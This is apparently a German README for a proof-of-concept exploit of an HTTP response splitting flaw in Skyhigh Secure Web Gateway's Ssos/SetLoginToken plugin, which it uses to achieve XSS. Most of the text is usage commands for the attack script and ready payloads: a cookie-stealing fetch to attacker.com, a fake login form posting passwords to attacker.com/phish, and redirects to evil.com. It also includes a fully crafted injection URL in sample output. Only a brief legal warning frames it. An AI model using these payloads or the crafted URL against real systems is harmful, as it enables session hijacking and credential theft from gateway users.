
Secure Web Gateway 10.2.11 - Cross-Site Scripting (XSS)
██████╗ ██████╗ ████████╗███████╗
██╔═████╗██╔══██╗╚══██╔══╝██╔════╝
██║██╔██║██████╔╝ ██║ ███████╗
████╔╝██║██╔═══╝ ██║ ╚════██║
╚██████╔╝██║ ██║ ███████║
╚═════╝ ╚═╝ ╚═╝ ╚══════╝
von 0PTS
Proof of Concept für die Schwachstelle HTTP Response Splitting in Skyhigh Secure Web Gateway (ehemals McAfee Web Gateway).
Kritische Schwachstelle HTTP Response Splitting in Skyhigh Secure Web Gateway, die Remote-XSS-Angriffe durch Injektion beliebigen HTML/JavaScript-Codes ermöglicht.
Die Schwachstelle befindet sich im Plugin "Ssos" (Aktion SetLoginToken), das URL-Parameter falsch verarbeitet:
Da die Zeilenumbruchszeichen (\r\n / %0d%0a) nicht maskiert werden, kann ein Angreifer:
Content-Type und Content-Length überschreibenDer Browser ignoriert den restlichen Inhalt der Antwort nach einem korrekt formatierten Content-Length, wodurch der angezeigte Inhalt vollständig ersetzt werden kann.
python explot.py
# Basis-XSS
python explot.py -d example.com -p "<script>alert(document.domain)</script>"
# Weiterleitung
python explot.py -d target.com -p '<meta http-equiv="refresh" content="0;url=https://evil.com/">'
# Phishing-Formular
python explot.py -d bank.com -p '<form action="https://evil.com/steal"><input name="pass" placeholder="Password"><button>Login</button></form>'
# Nur URL (ruhiger Modus)
python explot.py -d example.com -p "<script>alert(1)</script>" -q
-d, --domain Zieldomain (Standard: google.com)
-x, --prefix URL-Pfad-Präfix (Standard: SWG internal path)
-p, --payload HTML/JavaScript-Payload
-q, --quiet Ruhiger Modus – nur URL
-v, --version Skriptversion
-h, --help Hilfe
<script>fetch('https://attacker.com/log?c='+document.cookie)</script>
<html>
<body style="font-family:Arial">
<h2>Sitzung abgelaufen – Bitte erneut anmelden</h2>
<form action="https://attacker.com/phish" method="POST">
<input type="text" name="user" placeholder="Benutzername"><br>
<input type="password" name="pass" placeholder="Passwort"><br>
<button>Anmelden</button>
</form>
</body>
</html>
<meta http-equiv="refresh" content="0;url=https://malicious-site.com/">
██████╗ ██████╗ ████████╗███████╗
██╔═████╗██╔══██╗╚══██╔══╝██╔════╝
██║██╔██║██████╔╝ ██║ ███████╗
████╔╝██║██╔═══╝ ██║ ╚════██║
╚██████╔╝██║ ██║ ███████║
╚═════╝ ╚═╝ ╚═╝ ╚══════╝
[+] Ziel-Domain: example.com
[+] Payload-Länge: 43 Bytes
[+] URL-Länge: 234 Zeichen
[+] Generierte URL:
http://example.com/mwg-internal/de5fs23hu73ds/plugin?target=Ssos&action=SetLoginToken&v=1&c=1&p=p%0D%0AContent-Type%3A%20text%2Fhtml%3Bcharset%3Dutf-8%0D%0AContent-Length%3A%2043%0D%0A%0D%0A%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/mwg-internal/*⚠️ WARNUNG: Dieses Tool ist ausschließlich bestimmt für:
Die Verwendung gegen Systeme ohne ausdrückliche Genehmigung des Eigentümers ist rechtswidrig.
██████╗ ██████╗ ████████╗███████╗
██╔═████╗██╔══██╗╚══██╔══╝██╔════╝
██║██╔██║██████╔╝ ██║ ███████╗
████╔╝██║██╔═══╝ ██║ ╚════██║
╚██████╔╝██║ ██║ ███████║
╚═════╝ ╚═╝ ╚═╝ ╚══════╝